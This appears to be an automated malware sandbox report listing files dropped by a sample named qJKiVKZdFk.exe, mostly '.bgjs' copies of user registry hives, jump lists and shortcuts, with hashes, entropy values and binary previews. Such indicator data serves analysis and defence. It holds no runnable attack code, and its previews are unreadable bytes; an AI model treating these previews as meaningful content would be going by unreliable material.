                                                                                                                                      Preview:regf-e.rkcz.....9-]..._..%.................5fFQ.gO~,.....(.-.Z.....{...|.~&...J...\.....9U..P9.g...`Z...... .=..".<.`F.G;..HF.C...O.....,....5.9..f....d.q~..Kh.......~.h...k...M.;.0N!....m..+..y[....V.....G...+_h.*..,..v.[)+H.H...J...|9z...^?R..@p.XAE..)jI...Yy{.*6! e.b2..\.`f>...t"..p...y,$.r..."..$...i....mX..=g.M|..J......d;..@9..rb.u..}.J.oN...VHQ..4...$.M...^.....O.@..g...e5iE.Tl8gv~#.C.Z.])..4.+.$.E..0"_`uT....e.rK.li...!.....y.'....m....!....{...0v......T.P..y...S.b3...Ow..M..~m...)(.C.af9.Q.be..|..|.)rvp...zf..a&......O.9.T..k.$...)7...n.(.o.D...e........G.Z...;.V..0....Q.{4......3..f.#.iph........).{.z&J-"...:!.y....R.[...A......_J.._......o>...9-..6z}}c..h..:.O..Q..(brH.Q.{..|p.L.I8~..C.......I.....%.....n.|_.1.]PT..B.>.0.9..{...kU.{..B.....un....i....)....z.w.F.c..(..-e.....{./.,.`.9.O.....2<..o...JhG....2.6......."..s..p.2.D#..mU......_.MVia..M+..)od.s....}...t..2>*...<.A.._)...a.S....Z..g...=.2.y..g......N<7.....H.Ju\.."(.1

                                                                                                                                      C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3408206
                                                                                                                                      Entropy (8bit):4.763339561035251
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24576:dR/HmSc3XUooy1ncWOOctVMiA8DqkXci5QStPi5Uvf:dBGd3XUooyCOctVMiA8DqkXci5QCy+f
                                                                                                                                      MD5:C69D99BDCB3A1D08638C3ECBC06C6AAA
                                                                                                                                      SHA1:F227598779C45C8A4847A08A82DDC39F1B3A5C7B
                                                                                                                                      SHA-256:BC123C2303F61520E794FE96F285A091B42D0B6338FB51114E897A5EC5DB6FB4
                                                                                                                                      SHA-512:1A135F254A3B1AE127AA0599D5A27790F4DEF023A09C7F747BD36676FA5261B7DBF740A5189F98F0E3DBCF51DD2F95D89F7850845CBAC89424C4691AE8E79E34
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regfD...%.D.B..i.....g....}.j=..}b......w..."V.,)D>...i{.*..wG.......nWQ..e.[.$.T...k....1~.d..*)^....>...(=...kUI*.O.....Q.\%|..Po......$..1...I.......{A...@5......=...md.Z.m.|KWZ$.u...El...8........TY.r...&.......a..;..........\.n.2.;C..O.Tg..1..9D]];D[...;.e4U...r...x..._.rl.~.lx./.rS&Wr\w5J...t..`ihX....2...R+.o.....g.j...:...9.6....`YS}..Y..r.f....+..a..K..^@............[XO......&....!.yb..@w....O...!.zZR..(.q.....fB.*.1D...^V.7...psa...;.....3\m...0!....>..Hh.....{...A.5.......\..M. ..y......zg...Y.m..8e...|.S.{.B9[._%s%.m"X....C.U9...5P..g...,oK...c<u[.....Y~.HB...z.....c.5.e..q...\.w.&..xS&.Z..:t.]CB....od...........u.l(.+.a"A.........!G..$...(..k.@,.NL...k.u.V...qj87.y|0^.7]...`...h........G.Bi.G..{.k.....p.E.K..i.s.. .,a....j....8....d>.!6g....M..j....l<...@B..x...rF.....^^h!.7.DDKH\.. ..8...........S.f...!P.0...........9..n>c.{...W......;.q..?...3.XFnRIl.C#.w..E...$.......9.....I....~.....kL..$D..IpV...@..D2.K.h...C%...`g.

                                                                                                                                      C:\Users\jones\Local Settings\Temp\acrobat_sbx\acroNGLLog.txt.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):18241
                                                                                                                                      Entropy (8bit):7.990059228457249
                                                                                                                                      Encrypted:true
                                                                                                                                      SSDEEP:384:iov3pJhxdplmmV4ggm18NeZQRDK/mbNr3GfPntFToU94tK86L2GeOKcX:/v3p7zpUmV4g6cwWebNi3ntFUU94M8KB
                                                                                                                                      MD5:918B7A2BE01A86EEE91EE14432BF59BC
                                                                                                                                      SHA1:2F52C26C107D49EF947A6255D6B3C2362E151ADA
                                                                                                                                      SHA-256:C61D3ED02F37C9A1D63A0CFF97CDF3B8070638253DA3927946359CADAAD6AB87
                                                                                                                                      SHA-512:485EB8BB309345FFA80735FB03226A6088F6C0A4A9D33D088E9E7FFA5E043AC2146F5AB6AD333254DA97C0FA77BE53B169C99389273D45BB7395602DBBCFE000
                                                                                                                                      Malicious:true
                                                                                                                                      Preview:03-10.8......."`hM..4I..6X..t.. U....4..W<......BS!.j<.z.j...G...-iv.2&y...O........0.E....B...gX.c.h.FT.-.Kk.V.7.v...S.....M...f..<ON..wc(...C.x....\B...M....C/.7C9.,.....=.n.B.j....{R{w!..GD..[.........PR.P5...ygx.e.R}T5H........(..Zi..u~..2.$..W....~.J....).=v....s.u.w..d&.Z.*fN@z.F.8.......6.....J..d81.%..P.....".F.s....tW{.E...@.e."4.W.[....B._..V.2..'..?.*)Y;...&Fu~_.)b,.!..D.....<.P'bj.0.w+.......94...?X..:.|....r?..[K.'..5.X..........5b..DW..;o\..w..j...J.3.{4....Y'x.. [....:`.}....fM.ha.Z...Z~.X...............?.I..$}.......@.......0.!.72.Ke.AE.'.3.Na*../..8XS.*[=..4.K.>aj.fM\t..'.f.Of..X...".....]D.5=i.../......U.Y....N.+..c-.......k.F^L.?f.d...*..=..81e.A.r....Z..B.<....Q/K75....R4.B..v....*qZ.......... ..G.....Ej).j<..@..........{..m..?.~.# ..... ................Z...h.8.WyMk...,..U:.#...T>...{.U2.+....Z....j.4...F...V....n........p.sw...d..t...W}..|..B.?R..J3..4.....F.)c.....D....%..(..^T.NO4....1.3y.J.D...c...\{.Gt.!I

                                                                                                                                      C:\Users\jones\NTUSER.DAT

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3408206
                                                                                                                                      Entropy (8bit):4.917691589917308
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:0eHdpD/SyDIUHUpElepQM4DpaNYRXVmpaNYd9:Hn/S5r
                                                                                                                                      MD5:57297FD1C7B4383DCA829F81622B5D5F
                                                                                                                                      SHA1:44EF0545B5F6757C41498763B3844C105DD7FA54
                                                                                                                                      SHA-256:DC8D9694602A2F22352A2D2DE2CFC863D5C751ECB9E024B43BF9CBF13D86D38C
                                                                                                                                      SHA-512:CF19CE87108E7A35C110AE06F62FD21334B511BAC0901A2FE810FB2A15FFB9C06DE28DC688E7EEAEAA028F7F8C9331C9C2DE1660520DAC7EEC98FDEA43878AC6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.HzE.*....er.).]2:....M....Gv....f.c:.=.|.%..8.6.R%.X..Ky.Z6.0.y.V..r......`c..K8...HV..nj..89..w}.q3i..n.i..'m....y..v...h.F.5.]El..j..)...Q}.Ny=@....~.....hAi..\...%b.....8B.7.2.h....7..6Y_.H...?.(u...+...p..\;....^.=.....`.j..v..Xg.BF..<.D.?{K...zR...l.U....X..>....4.....k.EBC.wK...Tb.9.!..,|+.ba."..sj......d..t....K ...L.H.'../.l#T.T.|fQ.g.~>?...........T....g......".2=>.......>...T..]....fU.N........53/...q.uy.-...I.&....0>v..w..*.sg|..q.....t...T....&21.....E...u..O"..Uw...T1.......c;..>rg.]i.8.....]......$f......I.Ly.V..?.l....|_.&..+U{.4.<.jE.t..m........~..f.%..r .E..O...dN\...'..~d.o8.....*}...zm3..,.>..CH."...a.r^4.7...i..Mh.-.fh...4g.9......;."...#T.1........?.e.......E..y.......|X...r.E%.....{.W.g...[.....T.$..X1.~3.tuK..#.f....~..).{.w........0.k.U..c..;.o..Y-I&.P.;k.-.yt.}.e'w2P....A..-.W..M..Pd.1Ktw..qY......,.n..".wO.o........J.J....E:.x.)..=:../(C...H...A.R.'.r(....O..R.$c...n...e..;........@..In...c.U=Z

                                                                                                                                      C:\Users\jones\NTUSER.DAT.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3408206
                                                                                                                                      Entropy (8bit):4.917691589917308
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:49152:0eHdpD/SyDIUHUpElepQM4DpaNYRXVmpaNYd9:Hn/S5r
                                                                                                                                      MD5:57297FD1C7B4383DCA829F81622B5D5F
                                                                                                                                      SHA1:44EF0545B5F6757C41498763B3844C105DD7FA54
                                                                                                                                      SHA-256:DC8D9694602A2F22352A2D2DE2CFC863D5C751ECB9E024B43BF9CBF13D86D38C
                                                                                                                                      SHA-512:CF19CE87108E7A35C110AE06F62FD21334B511BAC0901A2FE810FB2A15FFB9C06DE28DC688E7EEAEAA028F7F8C9331C9C2DE1660520DAC7EEC98FDEA43878AC6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:regf.HzE.*....er.).]2:....M....Gv....f.c:.=.|.%..8.6.R%.X..Ky.Z6.0.y.V..r......`c..K8...HV..nj..89..w}.q3i..n.i..'m....y..v...h.F.5.]El..j..)...Q}.Ny=@....~.....hAi..\...%b.....8B.7.2.h....7..6Y_.H...?.(u...+...p..\;....^.=.....`.j..v..Xg.BF..<.D.?{K...zR...l.U....X..>....4.....k.EBC.wK...Tb.9.!..,|+.ba."..sj......d..t....K ...L.H.'../.l#T.T.|fQ.g.~>?...........T....g......".2=>.......>...T..]....fU.N........53/...q.uy.-...I.&....0>v..w..*.sg|..q.....t...T....&21.....E...u..O"..Uw...T1.......c;..>rg.]i.8.....]......$f......I.Ly.V..?.l....|_.&..+U{.4.<.jE.t..m........~..f.%..r .E..O...dN\...'..~d.o8.....*}...zm3..,.>..CH."...a.r^4.7...i..Mh.-.fh...4g.9......;."...#T.1........?.e.......E..y.......|X...r.E%.....{.W.g...[.....T.$..X1.~3.tuK..#.f....~..).{.w........0.k.U..c..;.o..Y-I&.P.;k.-.yt.}.e'w2P....A..-.W..M..Pd.1Ktw..qY......,.n..".wO.o........J.J....E:.x.)..=:../(C...H...A.R.'.r(....O..R.$c...n...e..;........@..In...c.U=Z

                                                                                                                                      C:\Users\jones\Recent\AutomaticDestinations\d00655d2aa12ff6d.automaticDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2894
                                                                                                                                      Entropy (8bit):7.921252650367388
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:kD0lxAoiYQwhAJpZXB55/qOiuskra+lmeonlVEAxy+4nOCRq6BdmQhCwdsD:rCsAJfBTpnvJlkFqOf6BdmQNI
                                                                                                                                      MD5:ABA28EB4F0E4D1F743D8CBF6EBF3B298
                                                                                                                                      SHA1:CB2C0EF0E695277EAD8EB7F664519AB6FAE40C10
                                                                                                                                      SHA-256:17A35B0FF451F073F5118C942F2CDFD4AB2435E3E1AA6509C8C0B5BF7F67E449
                                                                                                                                      SHA-512:4CB509CFF18A50A1ED62C26991CDF698DB4628371AEBBC5A8196DBACDA9184A55C44213D39834EB2F32054B064DB1932D82C68EE3CF7B815396626D7A9187C89
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......\21.._|..T.......~}`[.n_\.r.s.L..$GR...rC....<...O.!..`d.q)..$U[.........{.|1....8l..{.<2....WZ.7e.`g.(. A...H!.q.(.>!.........K.&...1~...w(.(....6.^.3.7..H0\..-.O..).V...=J....D..d....j.{....h..(U..cy.~...S.....5dW\t'...z]OP6d.Q.)..L..D...t....:.W4B.b..8Zz}....G..}A...........&e.0...P6.$...D.{.h.+.2.)....Z;G].5m...*.#....P....Pg.F}..\..T...T.1|w.r.V.|g..~SrZq*..w......_CK...=`.......9!<..-(.g...X...Qq?..e9..C...s...@_q.m|@T#.8d...m..j..WPc,;.r.E...hB#.. ...._,!..3..m..x.(.-.W`>.4{..j.....XT.....]..>wl.?.....)J..DyB[..D../ .5..M.}..mu..<W..k...h+.k...A.M..\....0..L...A.o(...,./.q..G.b.fZ..].?.).q.6.....JP.~5;.@_JD..9.......&.....2..(.&.Ho.VMX...j..ot.P@..!.K .".Q.Z...~n.!AL~..J3.2..k.Pi..B.......6kV]...D..N....~..Al............Sfm..(.......~AnZ.......m9...^..J.w."o._.GM............?.......%...q..c.p....e.4k.....L.j.}.T.YW+|.U...LX..9....e~n.d..x..<=...aN......r..`,.....*..QY:..%.X..%}.I....qDi..........3.....L....S(=8e...

                                                                                                                                      C:\Users\jones\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):9550
                                                                                                                                      Entropy (8bit):7.980789389107101
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:rkBWFg8QjYQ7hWH7XYBrKlB458yZtYHdAqm0lFpn:rk9sMIH7XMrKly58yvpq9lFpn
                                                                                                                                      MD5:003BEE4EFA62ABFDF1197B18B1DB1656
                                                                                                                                      SHA1:8611CE0093E84C745929C0F75CEF200DABECE565
                                                                                                                                      SHA-256:404BF98E27771E3B793814B0E40EB2EF9D6649758D0EF5C6EDC05ADF6223B925
                                                                                                                                      SHA-512:E93F5E961FDCECB79AA00C4CCB644D1D06CC3CFF0C126F33AB57D960AB814B9EB835382CBCE0235318CD37D31A65FA52D5CB703033A55F8E9DE63B1589DBBAE3
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....y..=O...R.yb...u...b.G>.....33(K....8..|/L.......4.......-..._.f.).c}.:...V(.a%..[Q...k.....T....<.e...G.=k7.7...aOF...^$....9........o.8. f...7...c.........?..&...NS25.G.;..N.^...JX...TG.W.[.2.....`O.Z.k....]A........c2.@/I.R._.H........3.........4O:..v> ..t.$.-..|..-..L.gJ..a..kC..L..-..|.P._.....=.T`...;.;..........);.&K(=...=.\.3rZ....e..j.[.s.....s....S...#,?....7&..L[x....l.O.$1`.......V.~*.J.3.......@i.0M.<.1..YU..c....f...........O...aS.{z.G..Z...p*xO5.Pz.....P....d.s...wtq....7......G..!.e.V.....G...=N5..H....ks.x|As......iM"0.d.)$./.._.{4...x2..58........`....]...<T.i.......)..R.p`........".#&I.%....4......<..Y7c...S..l...Bg.=...h....Xn.F.)T..s?..mgE;7'.s..^.7r'..|.C....u.....p.-i...)^L9F......qc.;.yV..y..`._..z.......7.E...u.....e....>>2.....%.`-mf.&..>QW..&.......2.(.[. ..3..9....fg.....W...\.6}.\...<v..Z}.j.[.Z.9._./MN3{4.[..p.d..B...r.8l.N.R.84.....K(Q.."wK..K@.U<..K<*T......'.>.j9.K.6..~...z..DO.r...$j.v|o."...\Z.

                                                                                                                                      C:\Users\jones\Recent\AutomaticDestinations\fb3b0dbfee58fac8.automaticDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2894
                                                                                                                                      Entropy (8bit):7.928115971299037
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:Y/AhQZj3ha2csBZWO+iKdP5K486VxLYQldRsC/WGacVX+8MJzrtl1ZD:Y/AhgapjK48uVnrWCu+cRzj
                                                                                                                                      MD5:EC0E2D437B05DA33BC57F89A0A889553
                                                                                                                                      SHA1:A16180B3898C65B78291DF5B2329273AA55B4211
                                                                                                                                      SHA-256:7870CA47B0C02715B0BDB5644D4470C7FECFABED05E3CF9C801F95AC36909639
                                                                                                                                      SHA-512:05C31C6C90627B01F7DF5E395182F0055CD8FFE4BC5388AF3958ADB77AE410FF2FDA821943107431BD0201050EF2007D04896D92F1875DCBC310373FD5F7666E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:....x..q.=...L.[3.L..,..]V.M.\.|.8.{u.I....-...@..).M~e...3.X....C.Dv.Q.z..".c.........L...o...B..^...P;+.|.!44.e.h.*..j.......!..<^$.D..;r..MU.gCX&p.c..T..zD@..U..Z...S....i4..fs.k...Q.....!Q...In.w.C..P.........vm..2..z......6.....$._.E?R..2.......\....\.d$..v..~0a...iN...:'..5......l...:'.XS...#...P%A`........}......R~..+. ).D..|.R. ..OX.J._.D...'0...|6.......tf4a..Ow...........P..d....Xb'...Z.<....NJ.Y.... 5.U...'8G.p8.q.(p.....A>...!.S.....{M@.P.L....o.....f.x&...[Go....[$zwx..r...*...^b..8N6v.Z..3.oP...Vjv....t."..q...l.qe.-..\.orvX.".Y....H5.@...?..=..cx,....L.%......P<fo8..o.$...56....K...[...[m....q........Y...#.Q....bY=.{S......GO9./u.........7..s.....u.A.D..5.$...<....or......t..f.g..i..B.,-.w..;H...9.F.Ka...u..3.OC..5.....H..n..NBLh.l.'{..H....../E:H.h.....(..h...7.D... .l....!#.*.v4..=g..C:..T#....A.w.1]..D.....f.~,/....v..^TJ.$2j.91[..rX...^........Y.aDCL.^..e........r...#s...gW........d...P.l......z.......I.0.e.......6%...

                                                                                                                                      C:\Users\jones\Recent\CustomDestinations\7e4dca80246863e3.customDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.30894408921438
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:fYUIvnl779suoqTJwnV4M6yoYvk0/f9ADBWyuc+77B2vS9U3ukIcii96Z:nIvnV7OuoDgcff9iBkLF2a8ukIcii9a
                                                                                                                                      MD5:B25A9513947779E7F9A289270800358B
                                                                                                                                      SHA1:12C7FA139C0E4330D9F19BAC99E58BF4D8C62BC0
                                                                                                                                      SHA-256:C5741809600172FDCE265A3C265D2F20E6AA610800DDB09E995100B3AAA4E560
                                                                                                                                      SHA-512:AADE826D46B35E7339268AD056FE1A61703D29E519DE95FB15AF2C7F3C11F5C1662D0D67620AD0178DB415E397F8364344C565C727519376E128B981CA649D32
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.......D.J^2*.?..P.|x8.R..u.x.^..)..+.(5.F..[.w.~..(bv.F.w.j..y.f.L..K....w..C((...t.....X..IVB?1ds."..I.I..9..Q.c......qh......&.<.U.5Wrf..M...]..c%..5.....Fn).?..br......d~.4I..Z.6.u....mn.W-9.G...EePSQf..\9N.....V....U....2....9.....c..6...D.....A .03...!..H....[.U.(.>.._3tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Recent\CustomDestinations\f01b4d95cf55d32a.customDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.295986422952154
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DkDJ4CzBiUrrj+13UjP94TOt7NJYxAtqTDDvgV6BsK3oniA33ukIcii96Z:DEvrrjyUr94TORHxsTDCysKYnlnukIcq
                                                                                                                                      MD5:7F8B9F542C240BCE58E434F9FA82E2AB
                                                                                                                                      SHA1:02773B364E3D0B4130702B4966FB4BFEE34D3CC3
                                                                                                                                      SHA-256:AEF859804D70DAE1DF7138B992431C73E009B6DA20E6700E6F07A77AA06DB182
                                                                                                                                      SHA-512:4131E7B4A1B669554C760A9A62DEFED704A09D241A9368571E387B492F13AA98F8F86DD77B34CA199230EDAA10D26F3291ADA2543FC32C7CEC6A8C8F5D5D0281
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:......z.k2.{...~O..I.z._....8Ix..>r..JFs@...Xn.rf8Lo..........L..M...'gJF;.^......e.W.q...A..r...Xp.:.v...^.Taj......V..V..W....SEa.;=..&A .uD.HJ..4.L..O]..$.....3.T.6v...h..."z.n)2m....,....M.#'L."....S...5G...Y(.e&.F.tS!bv\wL*....h.(.K.st.m6....*/..6W.."..7@B.Jtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Recent\CustomDestinations\f18460fded109990.customDestinations-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):358
                                                                                                                                      Entropy (8bit):7.33971331797188
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:HS4tRk1yaiPRLboCd9jdrFPv9B9Lzv6vaKvzVoV3ukIcii96Z:HSHydk8BBGZUukIcii9a
                                                                                                                                      MD5:116AA31E945969EDF7F363D7CECFD012
                                                                                                                                      SHA1:6C2541A00F659CB9DD73FBBC8DBBDFD17812D349
                                                                                                                                      SHA-256:6850DDA88BF918A26C833A60BE4B8F747DDE204EA7D70F1366B92FB9E7FDEAE1
                                                                                                                                      SHA-512:3FDDFF1DEA77550DE3E64F46449607A05EF24686805D9FBDE8D1302B9CCF72D8701D40DBCF120ADCAAEC3D8A5F78661B7831B43EE0C2E35F9009411CDA8EFDFE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.....m.WB...4..../..n..?...YG....4....."..8...\ZTP...?.......c'.\...3.... ....1.PJX...a...[.@....kCa.!...."..P..Y....R..ipk....*p.%....n...6..#._.....1.V.R....c.".~F.i...O.j`.u......u.THo.p.f..|5I ...[..B.o'.SQ.../.. ..NYK...q.W....S<S?.}.[.-i...>........].f#..Caf.....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1193
                                                                                                                                      Entropy (8bit):7.852089475692471
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y9bhn3Z0hareSmYcaGcMNl2LuHVjfeAPGsjkAjQcjjb/WNLbqoWvN4kuF1yBCJbD:Y9b5p0harBmKDMWLUVjnjjb/0LbgN4tT
                                                                                                                                      MD5:5D3F2B23374923B870D62F36ABF2E70F
                                                                                                                                      SHA1:B36C6743C94E1B7908E0C0D2448CE4F679C3BE3C
                                                                                                                                      SHA-256:5D1AF3F38D292D1180887B984E3EE29592C45233EA4B8A1E3C9018BA0F627E11
                                                                                                                                      SHA-512:B2AD7A105733D163DED71CE7954FBFE790B2051EB8C8432F6343734C84FB29884B005935C24C71765984BD5E9B5E302E1563E2D10F8B71EC380E67EA2E1151F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Y.x.....O.....:.....<`B?Kv.l.O}l..;..|0=.C-a....~.nnu...W|.I.f..B......'<.v...~X..Q....uj..U..L..~Y..2.S.aC`F....{..........<.`$....*.5.w0./YQ..-../..|....r..R..m....c..c..T{....<wov..Z..$..H........n....|...~..S...o..@......`.........%.[.._8......,W."5........N[..5(.~f..kg..I......CC..?...b)...+\.R.\..w.6!]3/v.`.yt./....A.:..[...@z.)qv3.N.__.d+.....4C.F.O..,.>....... .9.D.L\a.a....H..Y.P.{../.>~...{.\D...s..<.d..y..0..9....\..=..z. k....hh..pw.q.W..ke...n..h..#..B..l"...7.].=[.4..]@.nD.h.Y.k..<.d.....zn...R....D.[.R.......E.-.O.O./{..........xx7...d.4.X.f.[;6.7..?..Y0..7..K...N(.C..CF....).? ..Q..../g$ ..J$...7px,.#..d.......'.G....Qt......v.....3.`..kP....F...M......]...$ ...@C..d;.7.$..qga........0.......FW...9q..'T9..>!;8..Q.I....h..W...}...\._.'h.L?..v*...=.....dX......S......;..{.A.."...A..!..M...fd"..@....ob....'Gtgi......*.O.Q4[...Y.gm/...}&vX..%...c.)R.e.i...2."c..(....~Bo2).......?..n.C*....}/.w......jL.2.._.

                                                                                                                                      C:\Users\jones\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1002}-.searchconnector-ms.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1193
                                                                                                                                      Entropy (8bit):7.852089475692471
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Y9bhn3Z0hareSmYcaGcMNl2LuHVjfeAPGsjkAjQcjjb/WNLbqoWvN4kuF1yBCJbD:Y9b5p0harBmKDMWLUVjnjjb/0LbgN4tT
                                                                                                                                      MD5:5D3F2B23374923B870D62F36ABF2E70F
                                                                                                                                      SHA1:B36C6743C94E1B7908E0C0D2448CE4F679C3BE3C
                                                                                                                                      SHA-256:5D1AF3F38D292D1180887B984E3EE29592C45233EA4B8A1E3C9018BA0F627E11
                                                                                                                                      SHA-512:B2AD7A105733D163DED71CE7954FBFE790B2051EB8C8432F6343734C84FB29884B005935C24C71765984BD5E9B5E302E1563E2D10F8B71EC380E67EA2E1151F6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.Y.x.....O.....:.....<`B?Kv.l.O}l..;..|0=.C-a....~.nnu...W|.I.f..B......'<.v...~X..Q....uj..U..L..~Y..2.S.aC`F....{..........<.`$....*.5.w0./YQ..-../..|....r..R..m....c..c..T{....<wov..Z..$..H........n....|...~..S...o..@......`.........%.[.._8......,W."5........N[..5(.~f..kg..I......CC..?...b)...+\.R.\..w.6!]3/v.`.yt./....A.:..[...@z.)qv3.N.__.d+.....4C.F.O..,.>....... .9.D.L\a.a....H..Y.P.{../.>~...{.\D...s..<.d..y..0..9....\..=..z. k....hh..pw.q.W..ke...n..h..#..B..l"...7.].=[.4..]@.nD.h.Y.k..<.d.....zn...R....D.[.R.......E.-.O.O./{..........xx7...d.4.X.f.[;6.7..?..Y0..7..K...N(.C..CF....).? ..Q..../g$ ..J$...7px,.#..d.......'.G....Qt......v.....3.`..kP....F...M......]...$ ...@C..d;.7.$..qga........0.......FW...9q..'T9..>!;8..Q.I....h..W...}...\._.'h.L?..v*...=.....dX......S......;..{.A.."...A..!..M...fd"..@....ob....'Gtgi......*.O.Q4[...Y.gm/...}&vX..%...c.)R.e.i...2."c..(....~Bo2).......?..n.C*....}/.w......jL.2.._.

                                                                                                                                      C:\Users\jones\SendTo\Bluetooth File Transfer.LNK.bgjs (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1383
                                                                                                                                      Entropy (8bit):7.8714214674142
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:R/OK6i4Z5gAqYIcy80n1jJZsfFm06nicSRbx83KnAOWuO9GgJMtolccKEWIbD:sK6i4ZylRB910wX0i3AAOWuvt4WSD
                                                                                                                                      MD5:49E8A284FA8A3FFC0122B3F55EE3A571
                                                                                                                                      SHA1:96C1DB63D662448FBCE0E2B0EDDD086734879A93
                                                                                                                                      SHA-256:930070030B022CB9B996EB3CF81ECCAF91DB30206A6FD062B68450E09B28CAD8
                                                                                                                                      SHA-512:537CD83774580FA55E55B4FFCBDDFC3F56DF32B45D7BE0D9DF6AB5B58C7D1FF293B6E14C4BB06DE18F1AFE26AB1757669699501D54BE4042DDFD9E6A49629551
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:L.......:.a7..(.h....C.A........w.7....s.....%.(]J..F\OV...X....Q.T7...>c...:.T!.Q.E$.\..]....9...C...o.T....r.......zVq.q.s2...+E.=...)[..4A.)...V_J5.].J.d*.feB......F=6.L..{.LN ...A:3.T=.a;...< .+M..5...R.."^..-&..-..i(...2)U><..Q./.?.%.....t.{........v.R.-.4.j.G..W/.+.....$..<.y.{U#..x..y.9...{>Y..6..........ZD...h....N*.../...dqh..}N.o+'.7s.........#.Mc.X...~<.d..b.'....ES.....O..U...~.W.D...jr.FV..?@.....i.... 0......}.d...w.h.>_;A...s.m...&)},+8^b.|.,.P.N(.d....an.S1.!l.t..4.......O.aVS..k..nS.$K..o.H.#.....1.i".,O.C..;Z.]..u.].J.H..u*........ .X.....n&..<..........2.#.......F.....Fl....r...S.O..x..!......A~..9i.l......,~v..H.@.G...!.J ..3.....E..e...GHaw.g.?"...g.w.H2].Mz....^I...y...'1...rB....s.6~.e....md.RuD@..j'O.A...$.or.............3....|-I.....l.+..ee...wi|(YC...0.1.-.C..m1>c.......~.......M....\X.U.&.a..:...'l..ui.fK..=./`.....n7D..~t..|..$..z..q.$....J..2\QJg.|..c._..@..,_...3S..(..{.._.E.....l...n.xA.._..:...b. ...).y..

